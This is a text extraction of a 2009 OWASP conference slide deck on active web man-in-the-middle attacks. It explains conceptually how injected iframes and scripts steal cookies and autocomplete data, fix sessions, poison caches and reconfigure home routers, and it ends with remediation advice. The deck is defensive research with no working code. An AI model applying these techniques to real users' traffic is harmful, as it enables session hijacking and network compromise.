Date post: | 28-Dec-2015 |
Category: |
Documents |
Upload: | hilary-fletcher |
View: | 213 times |
Download: | 0 times |
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation1
Active Man in the Middle Attacks
The OWASP Foundation
OWASP
http://www.owasp.org
27/02/2009
Adi Sharabani
Security Research Group ManagerIBM Rational Application Security (a.k.a. Watchfire)
adish
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation2
Agenda
Background– Man in the Middle
– Network level – heavily researched
– Web application level – sporadic research
Outline– Passive MitM attacks
– Active MitM attacks
– Penetrating an internal network
– Remediation
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation3
Man in the Middle Scenario
All laptop users connect to a public network
Wireless connection can easily be compromised or impersonated
Wired connections might also be compromised
InternetInternet
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation4
Rules of Thumb – Don’ts …
Someone might be listening to the requests– Don’t browse sensitive sites
– Don’t supply sensitive information
Someone might be altering the responses– Don’t trust any information given on web sites
– Don’t execute downloaded code
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation5
Rules of Thumb – What Can You Do?
This leaves us with:
– Browse your favorite news site
– Browse your favorite weather site
InternetInternetNon-sensitive sites
Boring
Non-sensitive sites
Boring
Sensitive sites
Interesting
Sensitive sites
Interesting
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation6
You are still vulnerable
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation7
Mitigating a Fallacy
Fallacy–Executing JavaScript on victim == executing an attack
Reality–Same origin policy
–Executing an attack
–JavaScript + browser implementation bug –JavaScript + execution on a specific domain
– Can be done through XSS
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation8
Passive Man in the Middle Attacks
Victim browses to a website
Victim browses to a website
Attacker views the requestmanipulates it
and forwards to server
Attacker views the requestmanipulates it
and forwards to server
Attacker views the responsemanipulates it
and forwards to victim
Attacker views the responsemanipulates it
and forwards to victimServer returns a response Server returns a response
Other servers are not affectedOther servers are not affected
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation9
Active Man in the Middle Attack
The attacker actively directs the victim to an “interesting” site The IFrame could be invisible
Victim browses to a “boring” site
Victim browses to a “boring” site
Attack transfers the request to the
server
Attack transfers the request to the
server
Attacker adds an IFRAME referencing an “interesting” site
Attacker adds an IFRAME referencing an “interesting” site Server returns a response Server returns a response
My Weather ChannelMy Weather Channel
My Bank SiteMy Bank Site
Automatic request sent to the interesting server
Automatic request sent to the interesting server
My Bank SiteMy Bank Site
Other servers are not affectedOther servers are not affected
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation10
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation11
Stealing Cookies*
Automatic request contains victim’s cookies
Automatic request contains victim’s cookies
Obvious result Stealing cookies associated with any domain attacker desires Will also work for HTTP ONLY cookies
(as opposed to XSS attacks)
* A similar attack was presented by Mike Perry – SideJacking
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation12
Demo
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation13
Overcoming Same Origin Policy
Attacker adds a malicious scriptto the response
Attacker adds a malicious scriptto the response
Attacker forwards the automatic request to the
“interesting” server
Attacker forwards the automatic request to the
“interesting” serverScript executes with the “interesting” server’s restrictions
Script executes with the “interesting” server’s restrictions
“Interesting” server returns a response
“Interesting” server returns a response
Attacker injects an IFRAME directing to an “interesting”
site
Attacker injects an IFRAME directing to an “interesting”
site
Victim surfs to a “boring” site
Victim surfs to a “boring” site
Automatic request sent to the interesting server
Automatic request sent to the interesting server
Result– Attacker can execute scripts on any domain she desires
– Scripts can fully interact with any “interesting” website Limitations
– Will only work for non SSL web sites
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation14
Secure Connections
Login Mechanism
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation15
Secure ConnectionsPlease LoginPlease Login
UsernameUsernamePasswordPassword
SUBMIT
jsmith
********
SUBMITVictim browses to site
http://www.webmail.site
Victim browses to sitehttp://www.webmail.site
Site returns a response with login form
Site returns a response with login form
Victim fills login details,and submits the form
Victim fills login details,and submits the form
Login request is sent through a secure channel
Login request is sent through a secure channel
Login SuccessfulLogin Successful
Hello John Smith,
Pre-login action sent in clear text Attacker could alter the pre-login response to make the login
request sent unencrypted
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation16
Stealing Auto Completion Information
Script accesses the auto-completion information using the DOM
Script accesses the auto-completion information using the DOM
Attacker redirect victim to a request to a pre-login page
Attacker redirect victim to a request to a pre-login page
Attacker returns the original login form together with a malicious
script
Attacker returns the original login form together with a malicious
script
* A passive version of this attack was described by RSnake in his blog
Result– Attacker can steal any auto-completion information she desires
Limitations– Will only work for pre-login pages not encrypted
– Will not work seamlessly in IE
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation17
Demo
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation18
Broadening the Attack(Time Dimension)
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation19
Passive MitM Attacks
Active MitMAttacks
Active MitMAttacks
Active MitMAttacks
Active MitMAttacks
Present(“boring” sites)
Present(“boring” sites)
Past(“interesting” sites)
Past(“interesting” sites)
Future(“interesting” sites)
Future(“interesting” sites)
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation20
Session Fixation
Cookie is being saved on victim’s computer
Cookie is being saved on victim’s computer
Attacker redirects victim to the site of interest
Attacker redirects victim to the site of interest
Attacker returns a page with a cookie generated by server
Attacker returns a page with a cookie generated by server
A while later,victim connects to the site
(with the pre-provided cookie)
A while later,victim connects to the site
(with the pre-provided cookie)
Attacker uses the same cookie to connect to the server
Attacker uses the same cookie to connect to the server
Server authenticates attacker as victim
Server authenticates attacker as victim
Result– Attacker can set persistent cookies on victim
Limitations– The vulnerability also lies within the server
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation21
Cache Poisoning
Page is being cached onvictim’s computer
Page is being cached onvictim’s computer
Attacker redirects victim to the site of interest
Attacker redirects victim to the site of interestAttacker returns a malicious page
with cache setting enabled
Attacker returns a malicious page with cache setting enabled
A while later,victim visits the site
A while later,victim visits the site
Result– Attacker can poison any page she desires
– Poisoned pages will be persistent Limitations
– Attacker can poison non SSL resources
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation22
Complex Hacking Intranet Networks
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation23
Penetrating Internal Network – Simple Cache Poison
Result Attack will be launched every time victim accesses the resource The attack would executed within the local intranet
Characteristics Firewall protections are helpless Affected servers will never know The attack is persistent
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation24
Setting Up a Future MitM Scenario
Result Facilitates future MitM scenarios Does not require router’s credentials Fake settings could be displayed to the user
Limitations Requires victim to access router in the future Need to guess router’s address (10.0.1.1)
Using Active MitM Techniques, attacker poisons victim’s cache
related to his router’s web access
Using Active MitM Techniques, attacker poisons victim’s cache
related to his router’s web access
Router
Victim’s router related cache poisoned with a malicious script
Victim’s router related cache poisoned with a malicious script
Script hides the configuration changes
Script hides the configuration changes
Malicious script executedwhen victim tries to access router
Malicious script executedwhen victim tries to access router Script configures router to tunnel
future communication through attacker
Script configures router to tunnel future communication through
attacker
Outbound Proxy IP Address 216 187 118 221. . .
Primary DNS Server Address 216 187 118 221. . .
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation25
Increasing the Exposure
Poison common home pages– Script will execute every time victim opens his browser
Poison common scripts– Script will execute on every page using the common script
– Example: http://www.google-analytics.com/ga.js
The “double active” attack– Common poisoned page redirects to another poisoned resource
..JSJS
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation26
The Double Active Cache Poisoning Attack
Using Active MitM techniques,attacker poisons common
router’s address (i.e. 10.0.1.1)
Using Active MitM techniques,attacker poisons common
router’s address (i.e. 10.0.1.1)
At a later time,Victim opens browser
At a later time,Victim opens browser
Cached home page is loaded and redirects victim’s browser to
router’s web interface
Cached home page is loaded and redirects victim’s browser to
router’s web interface
Cached router’s web interface is loaded and malicious script changes router’s settings
Cached router’s web interface is loaded and malicious script changes router’s settings
Result Internal network has been compromised
Limitation Need to guess router IP and credentials
Attacker also poisons common home pages
Attacker also poisons common home pages
Router
Router is compromised by malicious script
Router is compromised by malicious script
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation27
Active Attack Characteristics
–Not noticeable in user’s experience
–Not noticeable by any of the web sites
–IPS/IDS will not block it–Can be persistent
–Can be used to hack into local organization
–Bypasses any firewall or VPN–Can be used with DNS Pinning Techniques
–A problem with the current design
–Requires only one plain HTTP request to be transmitted
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation28
Remediation
Users–Do not use auto-completion
–“Clean Slate Policy”
–Trust level separation
–Two different browsers–Two different users–Two different OS –Virtualization products
–Tunnel communication through a secure proxy– Might not be allowed in many hot-spots
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation29
Web owners–Consider risks of partial SSL sites
–Do not consider secure VPN connection as an SSL replacement
–Use random tokens for common scripts
– While considering performance issues
– Avoid referring external scripts from internal sites
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation30
Industry–Build integrity mechanism for HTTP
–Secure WiFi networks
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation31
Summary
Active MitM attacks– broaden the scope of the passive attacks– Design issues
– Dimension of time
– Past (steal cookies, auto-completion information, cache)
– Future (set up cookies, poison cache, poison form filler)
– Penetrating internal networks
– Persistent
– Bypass any current protection mechanisms
More information:– Paper and presentation will be uploaded to our blog:
http://blog.watchfire.com
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation32
References
Watchfire’s Blog: http://blog.watchfire.com Wireless Man in the Middle Attacks:
– http://www.informit.com/articles/article.aspx?p=353735&seqNum=7
SideJacking:– http://erratasec.blogspot.com/2007/08/sidejacking-with-hamster_05.html
More on SideJacking:– http://erratasec.blogspot.com/2008/01/more-sidejacking.html
Active SideJacking:– http://seclists.org/bugtraq/2007/Aug/0070.html
Surf Jacking– http://resources.enablesecurity.com/resources/Surf%20Jacking.pdf
Stealing User Information:– http://ha.ckers.org/blog/20060821/stealing-user-information-via-automatic-form-filling/
IBM Rational Application Security Group (aka Watchfire)
Web Based Man In the Middle Attack © 2009 IBM Corporation33
Thank you!